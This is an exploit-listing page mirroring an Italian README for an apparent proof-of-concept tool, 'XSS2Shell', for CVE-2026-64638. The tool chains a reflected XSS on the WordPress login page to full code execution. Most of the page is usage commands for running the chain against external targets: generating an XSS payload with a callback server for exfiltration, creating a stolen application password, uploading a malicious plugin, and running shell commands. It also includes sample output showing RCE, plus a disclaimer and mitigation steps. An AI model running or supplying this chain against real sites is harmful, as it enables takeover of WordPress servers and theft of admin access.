## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-IMBAS007-CVE-2026-64638-POC
# CVE-2026-64638 β XSS2Shell
> **XSS riflesso pre-autenticazione β Esecuzione remota di codice nel core di WordPress**
  
> β οΈ **DISCLAIMER:** Questo repository Γ¨ destinato **esclusivamente a ricerca di sicurezza autorizzata e scopi didattici**. Non utilizzarlo contro sistemi di cui non si Γ¨ proprietari o per i quali non si dispone di esplicita autorizzazione scritta. L'accesso non autorizzato Γ¨ illegale. Vedi SECURITY.md.
* * *
## Panoramica
CVE-2026-64638 Γ¨ una **XSS riflessa pre-autenticazione** nel pipeline di elaborazione di login/wplogin del core di WordPress. Il difetto deriva da un differenziale tra parser: l'input malformato sopravvive a `strip_tags()` di PHP ma viene successivamente ricostruito come HTML da `wp_kses_post()`, consentendo al markup controllato dall'attaccante di raggiungere il DOM.
I ricercatori di pwn.ai hanno dimostrato **XSS2Shell** β una catena che porta questa XSS alla piena esecuzione di codice PHP su un'installazione WordPress predefinita quando un amministratore autenticato interagisce con contenuti controllati dall'attaccante.
ProprietΓ | Valore
---|---
**CVE**| CVE-2026-64638
**CVSS**| 8.9
**Tipo**| Catena XSS riflessa β RCE
**Componente**| Pagina di login del core di WordPress
**Versioni interessate**| WordPress < 7.0.3 (backport fino alla 4.7)
**Corretta in**| WordPress 7.0.3 (6 agosto 2026)
**Causa principale**| Differenziale di parser: `strip_tags()` vs `wp_kses_post()`
* * *
## Avvio rapido (Docker)
root@kitploit:~
git clone https://github.com/<your>/CVE-2026-64638-POC.git
cd CVE-2026-64638-POC
# One command β spin up vulnerable WordPress 7.0.2 + run full chain
./test.sh up
./test.sh chain
**Cosa succede:**
root@kitploit:~
[STAGE 1] WordPress 7.0.2 β VULNERABLE
[STAGE 2] XSS payload URL generated
[STAGE 3] Application Password created
[STAGE 4] Plugin uploaded + activated
[STAGE 5] RCE β uid=33(www-data)
### Tutti i comandi
root@kitploit:~
./test.sh up # Start Docker + install WordPress (admin/admin123)
./test.sh scan # Detect version & patch status
./test.sh chain # Run full XSS2Shell RCE chain
./test.sh all # up + scan + chain (all-in-one)
./test.sh down # Stop containers
./test.sh clean # Stop + remove all volumes
# Or with Make
make up # Start Docker
make install # Install WordPress
make scan # Check vulnerability
make gen-xss # Generate XSS payload URL
make test-chain # Full RCE chain
make serve # Start callback server on :8080
make down # Stop containers
* * *
## Struttura del repository
root@kitploit:~
CVE-2026-64638-POC/
βββ README.md
βββ SECURITY.md # Security policy & disclaimer
βββ docker-compose.yml # WordPress 7.0.2 + MySQL 8 + WP-CLI
βββ Makefile # Shortcut commands
βββ test.sh # Automated test suite
βββ requirements.txt # Python dependencies
β
βββ xss2shell_chain.py # [MAIN] Full chain: scan β XSS β app-password β plugin β RCE
βββ xss2shell_scanner.py # Version detection + username reflection test
βββ xss2shell_checker.py # Lightweight patch checker (safe, non-exploitative)
βββ exploit_server.py # Callback server for XSS exfiltration
βββ xss_payload.html # Interactive XSS PoC (browser)
β
βββ docs/
βββ CHAIN.md # Technical breakdown of all 7 chain stages
βββ MITIGATION.md # Defensive guidance + detection rules
βββ PAYLOAD_NOTES.md # Notes on the CVE-specific bypass payload
* * *
## Utilizzo manuale (target esterno)
root@kitploit:~
python3 -m venv .venv && source .venv/bin/activate
pip install -r requirements.txt
# Scan target
python3 xss2shell_chain.py scan -u https://target.example.com
# Generate XSS payload
python3 xss2shell_chain.py gen-xss -u https://target.example.com -c http://your-ip:8080
# Full chain (requires WordPress admin credentials)
python3 xss2shell_chain.py chain \
-u https://target.example.com \
--user admin --pass "password" \
--cmd "id"
# Individual stages
python3 xss2shell_chain.py stage-apppass -u URL --user U --pass P
python3 xss2shell_chain.py stage-plugin -u URL --apppass "PASS"
python3 xss2shell_chain.py stage-rce -u URL --cmd "whoami"
* * *
## La catena di attacco XSS2Shell
Vedi `docs/CHAIN.md` per tutti i dettagli.
root@kitploit:~
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β 1. Reflected XSS on wp-login.php (failed-login error page) β
β 2. DOM clobbering to manipulate page context β
β 3. JSONP / Same-Origin Method Execution (SOME) β
β 4. Application Password creation via REST API β
β 5. REST API access with stolen Application Password β
β 6. Malicious plugin/theme upload β
β 7. PHP code execution β full RCE β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
> **Nota:** Le fasi 3-7 richiedono un amministratore con sessione attiva che interagisca con il payload XSS. La vulnerabilitΓ Γ¨ pre-autenticazione, ma la catena RCE completa richiede accesso a livello di amministratore per essere completata.
* * *
## Mitigazione
1. **Aggiornare immediatamente WordPress alla 7.0.3 o successiva**
2. Abilitare gli aggiornamenti automatici in background
3. Controllare le password applicazione (Utenti β Profilo)
4. Esaminare i log per username di login falliti sospetti
5. Monitorare l'attivitΓ di caricamento di plugin e temi
Vedi `docs/MITIGATION.md` per regole dettagliate di hardening e rilevamento.
* * *
## Riferimenti
* WordPress 7.0.3 Security Release
* pwn.ai XSS2Shell Blog
* pwn.ai SOME/CSP Bypass Writeup
* The Hacker News Coverage
* The CyberSec Guru Article
* CVE Record
## Autore
Ricerca sulla sicurezza e PoC. Solo per uso didattico.
## Licenza
MIT β Vedi LICENSE